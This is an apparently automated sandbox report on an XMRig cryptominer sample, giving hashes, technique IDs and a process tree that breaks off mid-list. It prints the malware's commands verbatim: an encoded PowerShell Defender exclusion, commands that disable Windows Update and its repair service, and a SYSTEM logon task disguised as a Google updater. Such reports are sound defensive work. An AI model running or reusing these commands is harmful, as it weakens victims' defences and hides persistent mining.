xmrig | 529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

General

Target

529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8.exe
Size

4.2MB
MD5

8268ff95b3aaea6d6de8f02a73c323d2
SHA1

ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256

529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA512

9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Score

10^/10

xmrig discovery evasion exploit miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 4 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/748-306-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/748-304-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/748-307-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/748-311-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

2256 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

296 takeown.exe
3900 icacls.exe
1208 takeown.exe
3724 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

296 takeown.exe
3900 icacls.exe
1208 takeown.exe
3724 icacls.exe

pid	process
2256	updater.exe

pid	process
296	takeown.exe
3900	icacls.exe
1208	takeown.exe
3724	icacls.exe

pid	process
296	takeown.exe
3900	icacls.exe
1208	takeown.exe
3724	icacls.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

conhost.exe

description	pid	process	target process
PID 1268 set thread context of 1684	1268	conhost.exe	conhost.exe
PID 1268 set thread context of 748	1268	conhost.exe	explorer.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3036 schtasks.exe

pid	process
3036	schtasks.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

powershell.execonhost.exepowershell.execonhost.exeexplorer.exe

pid	process
424	powershell.exe
424	powershell.exe
424	powershell.exe
2064	conhost.exe
3756	powershell.exe
3756	powershell.exe
3756	powershell.exe
1268	conhost.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe
748	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

628

pid	process
628

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	424	powershell.exe
Token: SeIncreaseQuotaPrivilege	424	powershell.exe
Token: SeSecurityPrivilege	424	powershell.exe
Token: SeTakeOwnershipPrivilege	424	powershell.exe
Token: SeLoadDriverPrivilege	424	powershell.exe
Token: SeSystemProfilePrivilege	424	powershell.exe
Token: SeSystemtimePrivilege	424	powershell.exe
Token: SeProfSingleProcessPrivilege	424	powershell.exe
Token: SeIncBasePriorityPrivilege	424	powershell.exe
Token: SeCreatePagefilePrivilege	424	powershell.exe
Token: SeBackupPrivilege	424	powershell.exe
Token: SeRestorePrivilege	424	powershell.exe
Token: SeShutdownPrivilege	424	powershell.exe
Token: SeDebugPrivilege	424	powershell.exe
Token: SeSystemEnvironmentPrivilege	424	powershell.exe
Token: SeRemoteShutdownPrivilege	424	powershell.exe
Token: SeUndockPrivilege	424	powershell.exe
Token: SeManageVolumePrivilege	424	powershell.exe
Token: 33	424	powershell.exe
Token: 34	424	powershell.exe
Token: 35	424	powershell.exe
Token: 36	424	powershell.exe
Token: SeDebugPrivilege	2064	conhost.exe
Token: SeShutdownPrivilege	2148	powercfg.exe
Token: SeCreatePagefilePrivilege	2148	powercfg.exe
Token: SeShutdownPrivilege	2152	powercfg.exe
Token: SeCreatePagefilePrivilege	2152	powercfg.exe
Token: SeShutdownPrivilege	2868	powercfg.exe
Token: SeCreatePagefilePrivilege	2868	powercfg.exe
Token: SeShutdownPrivilege	1124	powercfg.exe
Token: SeCreatePagefilePrivilege	1124	powercfg.exe
Token: SeDebugPrivilege	3756	powershell.exe
Token: SeIncreaseQuotaPrivilege	3756	powershell.exe
Token: SeSecurityPrivilege	3756	powershell.exe
Token: SeTakeOwnershipPrivilege	3756	powershell.exe
Token: SeLoadDriverPrivilege	3756	powershell.exe
Token: SeSystemProfilePrivilege	3756	powershell.exe
Token: SeSystemtimePrivilege	3756	powershell.exe
Token: SeProfSingleProcessPrivilege	3756	powershell.exe
Token: SeIncBasePriorityPrivilege	3756	powershell.exe
Token: SeCreatePagefilePrivilege	3756	powershell.exe
Token: SeBackupPrivilege	3756	powershell.exe
Token: SeRestorePrivilege	3756	powershell.exe
Token: SeShutdownPrivilege	3756	powershell.exe
Token: SeDebugPrivilege	3756	powershell.exe
Token: SeSystemEnvironmentPrivilege	3756	powershell.exe
Token: SeRemoteShutdownPrivilege	3756	powershell.exe
Token: SeUndockPrivilege	3756	powershell.exe
Token: SeManageVolumePrivilege	3756	powershell.exe
Token: 33	3756	powershell.exe
Token: 34	3756	powershell.exe
Token: 35	3756	powershell.exe
Token: 36	3756	powershell.exe
Token: SeDebugPrivilege	1268	conhost.exe
Token: SeShutdownPrivilege	1312	powercfg.exe
Token: SeCreatePagefilePrivilege	1312	powercfg.exe
Token: SeShutdownPrivilege	752	powercfg.exe
Token: SeCreatePagefilePrivilege	752	powercfg.exe
Token: SeShutdownPrivilege	864	powercfg.exe
Token: SeCreatePagefilePrivilege	864	powercfg.exe
Token: SeShutdownPrivilege	2116	powercfg.exe
Token: SeCreatePagefilePrivilege	2116	powercfg.exe
Token: SeLockMemoryPrivilege	748	explorer.exe
Token: SeLockMemoryPrivilege	748	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8.execonhost.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3036 wrote to memory of 2064	3036	529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8.exe	conhost.exe
PID 3036 wrote to memory of 2064	3036	529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8.exe	conhost.exe
PID 3036 wrote to memory of 2064	3036	529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8.exe	conhost.exe
PID 2064 wrote to memory of 1864	2064	conhost.exe	cmd.exe
PID 2064 wrote to memory of 1864	2064	conhost.exe	cmd.exe
PID 1864 wrote to memory of 424	1864	cmd.exe	powershell.exe
PID 1864 wrote to memory of 424	1864	cmd.exe	powershell.exe
PID 2064 wrote to memory of 1816	2064	conhost.exe	cmd.exe
PID 2064 wrote to memory of 1816	2064	conhost.exe	cmd.exe
PID 2064 wrote to memory of 3020	2064	conhost.exe	cmd.exe
PID 2064 wrote to memory of 3020	2064	conhost.exe	cmd.exe
PID 1816 wrote to memory of 2952	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 2952	1816	cmd.exe	sc.exe
PID 3020 wrote to memory of 2148	3020	cmd.exe	powercfg.exe
PID 3020 wrote to memory of 2148	3020	cmd.exe	powercfg.exe
PID 1816 wrote to memory of 3904	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 3904	1816	cmd.exe	sc.exe
PID 3020 wrote to memory of 2152	3020	cmd.exe	powercfg.exe
PID 3020 wrote to memory of 2152	3020	cmd.exe	powercfg.exe
PID 1816 wrote to memory of 2256	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 2256	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 2836	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 2836	1816	cmd.exe	sc.exe
PID 3020 wrote to memory of 2868	3020	cmd.exe	powercfg.exe
PID 3020 wrote to memory of 2868	3020	cmd.exe	powercfg.exe
PID 1816 wrote to memory of 2440	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 2440	1816	cmd.exe	sc.exe
PID 3020 wrote to memory of 1124	3020	cmd.exe	powercfg.exe
PID 3020 wrote to memory of 1124	3020	cmd.exe	powercfg.exe
PID 1816 wrote to memory of 2928	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 2928	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 2940	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 2940	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 2548	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 2548	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 3364	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 3364	1816	cmd.exe	sc.exe
PID 2064 wrote to memory of 3520	2064	conhost.exe	cmd.exe
PID 2064 wrote to memory of 3520	2064	conhost.exe	cmd.exe
PID 1816 wrote to memory of 3900	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 3900	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 1368	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 1368	1816	cmd.exe	sc.exe
PID 3520 wrote to memory of 3036	3520	cmd.exe	schtasks.exe
PID 3520 wrote to memory of 3036	3520	cmd.exe	schtasks.exe
PID 1816 wrote to memory of 484	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 484	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 1532	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 1532	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 3940	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 3940	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 3288	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 3288	1816	cmd.exe	sc.exe
PID 1816 wrote to memory of 1208	1816	cmd.exe	takeown.exe
PID 1816 wrote to memory of 1208	1816	cmd.exe	takeown.exe
PID 1816 wrote to memory of 3724	1816	cmd.exe	icacls.exe
PID 1816 wrote to memory of 3724	1816	cmd.exe	icacls.exe
PID 1816 wrote to memory of 3972	1816	cmd.exe	reg.exe
PID 1816 wrote to memory of 3972	1816	cmd.exe	reg.exe
PID 1816 wrote to memory of 3804	1816	cmd.exe	reg.exe
PID 1816 wrote to memory of 3804	1816	cmd.exe	reg.exe
PID 1816 wrote to memory of 1840	1816	cmd.exe	reg.exe
PID 1816 wrote to memory of 1840	1816	cmd.exe	reg.exe
PID 1816 wrote to memory of 1976	1816	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8.exe
"C:\Users\Admin\AppData\Local\Temp\529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3036

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2064

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
3⤵
- Suspicious use of WriteProcessMemory
PID:1864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:1816

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
PID:2952

C:\Windows\system32\sc.exe
sc stop bits
4⤵
PID:3904

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
PID:2256

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
PID:2836

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
PID:2440

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
4⤵
PID:2928

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
4⤵
PID:2940

C:\Windows\system32\sc.exe
sc config bits start= disabled
4⤵
PID:2548

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
4⤵
PID:3364

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
4⤵
PID:3900

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
4⤵
PID:1368

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
4⤵
PID:484

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
4⤵
PID:1532

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
4⤵
PID:3940

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
4⤵
PID:3288

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1208

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3724

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
4⤵
PID:3972

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
4⤵
PID:3804

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
PID:1840

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
PID:1976

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
PID:2760

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
PID:1076

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
4⤵
PID:4000

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
4⤵
PID:3376

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
4⤵
PID:1044

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
4⤵
PID:756

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
4⤵
PID:776

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:3744

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:2348

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:3020

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2148

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2152

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2868

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1124

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:3520

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
4⤵
- Creates scheduled task(s)
PID:3036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
3⤵
PID:304

C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
4⤵
- Executes dropped EXE
PID:2256

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1268

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
6⤵
PID:812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:3412

C:\Windows\system32\sc.exe
sc stop wuauserv
7⤵
PID:1016

C:\Windows\system32\sc.exe
sc stop bits
7⤵
PID:360

C:\Windows\system32\sc.exe
sc stop dosvc
7⤵
PID:1012

C:\Windows\system32\sc.exe
sc stop UsoSvc
7⤵
PID:1192

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
7⤵
PID:3020

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
7⤵
PID:1536

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
7⤵
PID:3692

C:\Windows\system32\sc.exe
sc config bits start= disabled
7⤵
PID:2148

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
7⤵
PID:2836

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
7⤵
PID:2164

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
7⤵
PID:4080

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
7⤵
PID:304

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
7⤵
PID:2440

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
7⤵
PID:416

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
7⤵
PID:3060

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:296

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3900

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
7⤵
PID:1900

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
7⤵
PID:2564

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
7⤵
PID:3296

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
7⤵
PID:4068

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
7⤵
PID:3956

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
7⤵
PID:2308

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
7⤵
PID:1208

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
7⤵
PID:1184

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
7⤵
PID:1532

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
7⤵
